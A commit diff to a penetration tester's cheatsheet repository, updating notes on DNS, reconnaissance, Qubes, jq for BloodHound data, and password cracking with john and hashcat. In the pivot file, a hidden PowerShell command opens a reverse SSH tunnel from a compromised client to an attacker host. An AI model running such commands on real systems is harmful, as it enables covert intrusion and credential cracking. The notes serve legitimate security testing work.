More cheatsheets

api/censys.md

@@ -2,6 +2,11 @@
 https://search.censys.io/api
 https://search.censys.io/search/definitions
 
+### API key
+```
+echo "ApiId:Secret" | base64
+```
+
 ### Return details about current subscription
 ```
 curl -s "https://search.censys.io/api/v1/account" -H "accept: application/json" -H "Authorization: Basic <apiKey>"

linux/dig.md

@@ -1,3 +1,8 @@
+### Resolve domain using specific DNS server and TCP
+```
+dig +tcp @<dnsServer> <domain>
+```
+
 ### Get nameserver
 ```
 dig +short NS <domain>

linux/dnsx.md

@@ -3,7 +3,7 @@ https://github.com/projectdiscovery/dnsx
 
 ### Resolve domains to ipv4 from file
 ```
-dnsx -a -l <file>
+dnsx -silent -a -resp -l <file>
 ```
 
 ### Get asn of domain

linux/droopescan.md

@@ -1,6 +1,11 @@
 ### Source
 https://github.com/SamJoan/droopescan
 
+### Install
+```
+pipx install droopescan
+```
+
 ### Scan drupal plugins (alternative joomla or moodle), -t threads
 ```
 droopescan scan drupal -u http://<domain> -t <number>

linux/fish.md

@@ -18,3 +18,13 @@ history -t -R
 set -x varName "content"
 ```
 
+### Delete word to the right
+```
+Alt + d
+```
+
+### Delete word to the left
+```
+CTRL + w
+```
+

linux/git.md

@@ -4,14 +4,14 @@ git config user.name "r1cksec"
 git config user.email "[email protected]"
 ```
 
-### Sign files with given key
+### List config of current repository
 ```
-git config --global commit.gpgsign true
+git config --list --local
 ```
 
-### List config of current repository
+### Sign files with given key
 ```
-git config --list --local
+git config --global commit.gpgsign true
 ```
 
 ### Show available tags
@@ -89,3 +89,4 @@ git config --global --unset http.proxy
 ### Generate access token
 * https://docs.github.com/en/github/authenticating-to-github/creating-a-personal-access-token
 
+

linux/gitfive.md

@@ -6,3 +6,8 @@ https://github.com/mxrch/gitfive
 gitfive emails <emailFile>
 ```
 
+### Grep github account names from results
+```
+cat <result> | grep "@" | grep -v "@@\|@mxrchreborn" | cut -d "@" -f 3 | cut -d " " -f 1
+```
+

linux/guestfist.md

@@ -0,0 +1,12 @@
+### Install
+```
+apt install guestfish
+```
+
+### Get filesystem
+```
+guestfish --ro -a <file>.vhdx
+> run
+> list-filesystems
+```
+

linux/guestmount.md

@@ -1,7 +1,17 @@
 ### Source
 https://github.com/libguestfs/libguestfs/blob/master/fuse/guestmount  
 
-### Mount vhdx format
+### Install
+```
+apt install guestmount
+```
+
+### Mount vhdx
+```
+guestmount --add <file>.vhdx -m </dev/sdX> /mnt/<mountpoint>
+```
+
+### Mount vhdx os
 ```
 guestmount --add <file>.vhdx --inspector --ro /mnt/<mountpoint>
 ```

linux/hashcat.md

@@ -43,6 +43,7 @@ hashcat -o <outfile> -m <hashType> -a 3 <fileToCrack> -1 ?l?u?d ?1?1?1?1?1?1 -m
 1400 = SHA256
 1410 = sha256($pass.$salt)
 1420 = sha256($salt.$pass)
+1800 = sha512crypt $6$, SHA512 (Unix)
 2100 = Domain Cached Credentials (DCC), MS Cache - format: $DCC2$10240#<user>#<hash>
 2500 = WPA/WPA2
 5600 = NetNTLMv2

linux/john.md

@@ -3,8 +3,8 @@ https://github.com/openwall/john
 
 ### Install
 ```
-wget https://www.openwall.com/john/k/john-currentNumber-jumbo-1.tar.xz
-tar -xf <file>
+git clone https://github.com/openwall/john
+apt install libssl-dev -y
 cd <johnRepo>/src
 ./configure && make
 ../run/john
@@ -35,19 +35,19 @@ wpapsk (wpa2)
 john --loopback --fork=4
 ```
 
-### File containing cracked passwords
+### List all formats
 ```
-~/.john/john.pot
+john --list=formats
 ```
 
-### List all formats
+### Using korelogic rules
 ```
-john --list=formats
+john --wordlist=<wordlist> <hashFile> --rules=korelogic --format=NT
 ```
 
-### Example
+### Using specific session and pot
 ```
-john --wordlist=<wordlist> <fileToCrack> --rules=korelogic --format=NT
+john <hashFile> --session=<sessionName> --pot=<potFile>
 ```
 
 ### Convert file for john

linux/jq.md

@@ -1,36 +1,13 @@
 ### Source
 https://github.com/stedolan/jq
 
-### Print one line json file as multiple lines
+### Print distinguishedname of bloodhound users
 ```
-jq <file>.json
+cat <userFile>.json | jq '.data[].Properties.distinguishedname
 ```
 
-### Retrieve values from key
+### Print attributes of bloodhound user
 ```
-{
-  "pos1": {
-    "key1": "val1",
-    "key2": "val2"
-  },
-  "key3": "val3"
-}
-
-jq ".pos1 .key1" <file>.json
-```
-
-### Retrieve multiple values from key
-```
-cat <file>.json | jq -r ".pos1 .key1, .key3"
-```
-
-### Retrieve values from array (example: name of computer from bloodhound json result)
-```
-cat <file>.json | jq -r ".data[] .Properties .name"
-```
-
-### Retrieve multiple values from array 
-```
-jq ".data[] .Properties | .name, .distinguishedname, .operatingsystem, .serviceprincipalnames" <file>.json
+cat <userFile>.json | jq '.data[].Properties | select(.name | ascii_downcase == "<name>")'
 ```
 

linux/openssl.md

@@ -16,3 +16,8 @@ openssl enc -aes-256-cbc -pbkdf2 -k <password> <file> > <encryptedFile>
 openssl enc -d -aes-256-cbc -pbkdf2 -k <password> <encryptedFile> > <file>
 ```
 
+### Print information
+```
+openssl x509 -in <file>.pem -text -noout
+```
+

linux/qubes.md

@@ -0,0 +1,45 @@
+### Install software in dom0
+```
+sudo qubes-dom0-update <packet>
+```
+
+### Run command on another qube
+```
+qvm-run --pass-io <qubeName> '<command>'
+```
+
+### Copy file to dom0
+```
+qvm-run --pass-io <qubeName> 'cat <file> > <outFile>'
+```
+
+### Copy file to qube
+```
+qvm-copy-to-vm <qubeName> <file>
+```
+
+### List network information of qube
+```
+qvm-ls -n <qubeName>
+```
+
+### Extend disk space of standalone qube to 30GB
+```
+qvm-volume extend <qubeName> 30g
+```
+
+### Extend initial memory of qube to 8GB
+```
+qvm-prefs <qubeName> memory 8000
+```
+
+### Extend maximal memory of qube to 8GB
+```
+qvm-prefs <qubeName> maxmem 8000
+```
+
+### Watch memory usage
+```
+xentop
+```
+

linux/sed.md

@@ -38,8 +38,8 @@ echo "00123" | sed 's/^0*//'
 echo "    some string" | sed -e 's/^[[:space:]]*//'
 ```
 
-# Edit file in place
+### Replace german umlaute
 ```
-sed -i 's/replaceThis/replaceWith/g' <file>
+sed 's/ä/ae/g; s/Ä/Ae/g; s/ö/oe/g; s/Ö/Oe/g; s/ü/ue/g; s/Ü/Ue/g; s/ß/ss/g'
 ```
 

linux/pivot.md → other/pivot.md

@@ -1,4 +1,4 @@
-### Start ssh connection from compromised client to ssh server
+### Start ssh connection on compromised client
 ```
 Start-Process -FilePath "powershell" -ArgumentList " -w hidden -c ssh -p 22 -o 'StrictHostKeyChecking=no' -i $HOME\.ssh\<privateKey> -N -R 9050 <user>@<sshRhost>"
 ```
@@ -28,3 +28,8 @@ sed -i 's/ 9050/ 9051/g' /etc/proxychains4.conf
 proxychains firefox
 ```
 
+### Add DNS resolver to proxy
+```
+/usr/lib/proxychains3/proxyresolv
+```
+

theorie/recon-methodology.md

@@ -234,7 +234,7 @@ The metadata can also contain other informations like domains or e-mail addresse
 strings * | grep -i "@"
 ```
 
-Searching for PDF documents and extracting the metadata can also be done at once with the script `get-pdf-metadata` (see https://github.com/r1cksec/thoth/blob/master/scripts/get-pdf-metadata)
+Searching for PDF documents and extracting the metadata can also be done at once with the script `get-pdf-metadata` (see https://github.com/r1cksec/corptrace/blob/master/ressources/modules/startpage_get_pdf_metadata.py)
 
 ```
 get-pdf-Metadata <domain>
@@ -306,12 +306,6 @@ But it is still possible to collect employees using Google Dorks.
 intitle:"companyName" inurl:"linkedin.com/in/" site:linkedin.com
 ```
 
-Since automation is king, there is of course a script `dork-linkedIn-employees` that crawls the first pages of the Dork query results (see https://github.com/r1cksec/thoth/blob/master/scripts/dork-linkedIn-employees)
-
-```
-python3 dork-linkedIn-employees <companyName>
-```
-
 Alternativly, you can pay for rekruting solutions like PhantomBuster (see https://phantombuster.com) and thus obtain additional information.
 
 Another source to get more email addresses are known database leaks.